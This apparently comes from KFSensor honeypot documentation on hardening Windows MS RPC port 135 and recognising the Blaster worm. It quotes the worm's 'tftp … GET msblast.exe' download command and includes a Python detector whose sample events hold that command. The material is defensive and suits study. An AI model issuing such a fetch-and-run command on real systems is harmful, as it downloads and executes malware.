MS RPC, port 135, DCOM buffer overrun and the Blaster worm
Microsoft's RPC implementation runs over TCP port 135.
RPC is used by a number of higher level protocols for their transport layer, such as by DCOM.
Vulnerabilities have been found in Microsoft's RPC implementation and the services it gives access to.
Closing TCP port 135
It is highly desirable to close port 135 and to allow KFSensor to listen on it. Port 135 is consistently one of the most attacked ports on the Internet.
It is not possible to simply disable the RPC service as there are many essential parts of Windows that require RPC to be running even though they do not make network connections.
However, Microsoft does not allow RPC to be configured to use a different port, and by default it is bound to all network interfaces, making it vulnerable to attack from the Internet.
The following sections describe how to disable services that run on top of RPC, which is desirable in itself, and then to close port 135 itself.
Disable RPC dependent services
Several non-essential services use RPC and these should be disabled.
Shut down and disable the following services in the Services console.
SSDP Discovery Service
System Event Notification
Remote Desktop Help Session Manager
Distributed Transaction Coordinator
Task Scheduler service
COM+ Event System
COM+ System Application
Windows DCOM allows applications to share COM functionality over a TCP/IP network. Only a few applications have ever used DCOM, and it is due to be phased out by Microsoft. This functionality is turned on by default and uses RPC.
It is possible to reconfigure MS RPC to make it safer using a Microsoft configuration tool, rpccfg.
To obtain this tool go to www.microsoft.com and enter rpccfg into their site search and download it from the link.
The idea is to get RPC to only bind to the loopback address.
After performing the above, reboot the machine.
If all the services that use RPC have been shut down, then port 135 should now be closed and KFSensor will be able to use it.
Patching the RPC server
This technique is suitable for Windows XP and 2003 only. Later versions of Windows contain a feature that recognizes when system files have been changed and repairs them automatically, thus overwriting the patch.
Microsoft RPC cannot be configured to listen on a port other than 135.
The server needs to be patched using a hex editor.
The RPC server is implemented in a file called rpcss.dll; however, this file is in constant use.
On 16 July 2003 Microsoft released a patch to fix a buffer overrun in its Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface.
On 11 August 2003 a new worm ('Blaster') was detected which exploited this vulnerability and rapidly infected large numbers of unpatched machines.
The Blaster worm attacks a Windows machine by first executing a buffer overrun against TCP port 135. This causes a vulnerable machine to listen on TCP port 4444 and execute the following command: "tftp -i 18.104.22.168 GET msblast.exe". This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues.
You can find a full description of the Blaster worm here:
If attacked by the Blaster worm, you will see the following two events in quick succession.
1. Port 135: received 1776 bytes containing the binary buffer overrun.
2. Port 4444: containing the following text:
tftp -i 22.214.171.124 GET msblast.exe
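The two-event pattern above can be correlated automatically. The following is an added example, not KFSensor's own code or log format: it reads constructed honeypot events in an assumed "timestamp,port,bytes,payload" layout and reports a Blaster hit when a 1776-byte delivery to port 135 is followed within a short, assumed window by a port 4444 payload containing the tftp GET of msblast.exe.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (assumed layout, not KFSensor's real log format).
# The IP address is a documentation address, not a real attacker.
SAMPLE_EVENTS = """\
2003-08-12 10:01:03,135,1776,<binary>
2003-08-12 10:01:05,4444,40,tftp -i 192.0.2.10 GET msblast.exe
2003-08-12 10:15:00,135,72,<binary>
2003-08-12 10:30:00,4444,20,echo hello
"""

# The command string the page describes, with the source host captured.
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+msblast\.exe", re.IGNORECASE)
OVERRUN_PORT, OVERRUN_SIZE = 135, 1776   # from the page's first event
SHELL_PORT = 4444                         # from the page's second event
WINDOW = timedelta(seconds=30)            # assumed meaning of "quick succession"


def parse_events(text):
    """Parse 'timestamp,port,bytes,payload' lines into tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, port, size, payload = line.split(",", 3)
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       int(port), int(size), payload))
    return events


def find_blaster(events):
    """Return (overrun_time, shell_time, tftp_host) for each correlated pair."""
    overruns = [e for e in events
                if e[1] == OVERRUN_PORT and e[2] == OVERRUN_SIZE]
    hits = []
    for ts, port, _size, payload in events:
        if port != SHELL_PORT:
            continue
        match = TFTP_RE.search(payload)
        if not match:
            continue
        # Pair the shell command with the most recent overrun inside the window.
        for o_ts, _p, _s, _pl in reversed(overruns):
            if timedelta(0) <= ts - o_ts <= WINDOW:
                hits.append((o_ts, ts, match.group(1)))
                break
    return hits


if __name__ == "__main__":
    for overrun_at, shell_at, host in find_blaster(parse_events(SAMPLE_EVENTS)):
        print(f"Blaster pattern: overrun {overrun_at}, shell {shell_at}, tftp from {host}")
```

A lone port 135 overrun or a port 4444 payload without the tftp command is not reported, so noise from unrelated scans does not trigger the match.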